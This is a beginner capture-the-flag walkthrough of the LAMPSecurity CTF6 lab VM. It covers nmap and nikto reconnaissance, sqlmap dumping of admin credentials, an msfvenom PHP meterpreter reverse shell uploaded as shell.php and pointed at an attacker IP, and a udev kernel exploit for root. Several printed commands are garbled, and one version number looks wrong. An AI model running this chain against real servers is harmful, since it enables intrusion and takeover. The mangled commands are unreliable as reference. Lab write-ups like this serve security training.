Hello readers, today we are going to solve Lamp securityctf6. This is a beginner level challenge. In this walk through we are going to
exploit the VM and gain the root privilege. Lets begin and get the root access.
List of actions
- Reconnaissance the target
- Web application enumeration
- Sql injection using sqlmap
- Web application exploitation using backdoor
- Get the restricted shell access of the target
- Upload exploit
- Gain root privilege
1 Reconnaissance
First of all we have to discover the target vm using
netdiscover tool in Kali.
Finally we have got our Target VM after the search result.
Now we know our target VMs IP. So lets scan with nmap to
discover the open ports and services running inside the target. For doing so
please execute the below command and wait for the result.
Nmap –sT –O –p- 172.16.2.93
From the above screenshot we can observe a webserver is
running on port 80. So lets open the website and enumerate for further
information.
2 Web application enumeration
The above website is running on port 80. Now lets scan the
website using nikto and find out if any vulnerability exists.
The scan results give us some fruiteful information. As per
the result we can do directory indexing on below file paths, which may give us
some sensitive information about the web application.
-
/files/
-
/sql/
Let’s enumerate those paths and find out if we get any
information in it.
From the above screenshot we get to know this directory
contains some image files. Later we will see how to upload a backdoor within
it.
From the above scrrenshot we can observe a file exists with
name db.sql. Lets open the file and see if we can get any login credentials.
From the above screenshot we can see somewhere in between
the file the credentials for admin was written in plaintext.
Username = admin
Password = adminpass
3 Sql injection using sqlmap
We can try to get the credentilas with sqlmap also. So lets
get the admin password using sqlmap as well.
Type the following sqlmap command in the console and hit
enter
Sqlmap –o –p “http://172.16.2.93/?action=login”
- - forms - - dbs
From the above command we have got the below databases.
Our target is cms, So
lets enumerate the db and find out the tables inside. For the please execute
the command below.
Sqlmap –o –p “http://172.16.2.93/?action=login”
- - forms - - dbs cms –tables.
As a result we have got three results below.
Now get the data inside the user table. For doing that
please execute the below command.
Sqlmap –o –p “http://172.16.2.93/?action=login”
- - forms – D cms –T user – dumps
We have successfully got the admin credentials.
As we have got the adman credentials let’s try to login
inside the application admin panel.
We have successfully logged inside the admin account.
4 Web application exploitation using backdoor
Now using the Add Event page we will try to upload the
backdoor and get the shell of the server.
For doing that enter the below command in kali machine.
Msfvenom –p php/meterpreter/reverse_tcp lhost=172.16.2.155
lport=4444 –f raw
After getting the result copy the code from <?php to
die(); and save it on the desktop with the name shell.php
Now lets move to the application and try to upload the
shell.php file.
After that come back to kali machine and start the
msfconsole and execute the below commands to get the meterpreter session.
Now come back to the web application and browse to the below
directory to execute the uploaded file shell.php
172.16.2.93/files/shell.php
We have successfully got the meterpreter session.
Now run the ‘sysinfo’ command to get the server kernel
information. So that we can searh for any exploit for escalating root
privilege.
As per the above
sceenshot the kernel version for the target system is 1.6.18-92. Lets search
the expoit from the internet.
After multiple search I have got the below exploit in
exploit-db.
Lets download the explot and upload it inside the /tmp
directory of the target system.
5 Upload exploit
For doing that please follow the below steps.
6 Get the restricted shell access of the
target
After successfully upload the file lets run the ‘shell’
command and type the below python script in the shell and execute it to get the
restrictive access of the target bash command prompt.
Now go to the /tmp folder and give the perssion to the file
using ‘chmod’ command
7 Gain root privilege
Now run the below command to get the netlink id and after
that execute the udev.sh file with the id as argument.
Congratulation!! We have successfully got the root access.
But one small thing keep in mind you might have to execute the shell script
more than one time to get the root access as you can see I have tried more than
one time to be assured of execution of the script successfully. If you have any
further doubt on this please let me know in the comment section. Thanks for
reading my article. Happy hacking!!
0 comments:
Post a Comment